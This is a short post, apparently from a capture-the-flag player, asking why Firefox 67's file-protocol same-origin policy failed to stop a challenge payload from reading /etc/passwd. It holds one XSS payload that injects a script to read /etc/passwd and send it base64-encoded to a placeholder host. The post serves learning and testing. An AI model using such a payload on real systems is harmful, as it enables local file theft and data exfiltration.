Tags: ssrf directorylisting xss
I noticed an issue: in Firefox, starting in Gecko 1.9, the file protocol's same-origin policy restricts the files that can be read to those in the same directory or a subdirectory.
But I just tested on the challenge server:
```
file:///app/templates/index.html?grey","status":"ok","content":["\"><script>fetch('file:///etc/passwd').then(r=>r.text()).then(data=>fetch('http://IP/'%2Bbtoa(data)))</script>
```
(The content has been truncated.)
It's OK to read /etc/passwd.
The Firefox on the challenge server is version 67; it should ban the request to file:///etc/passwd, so why?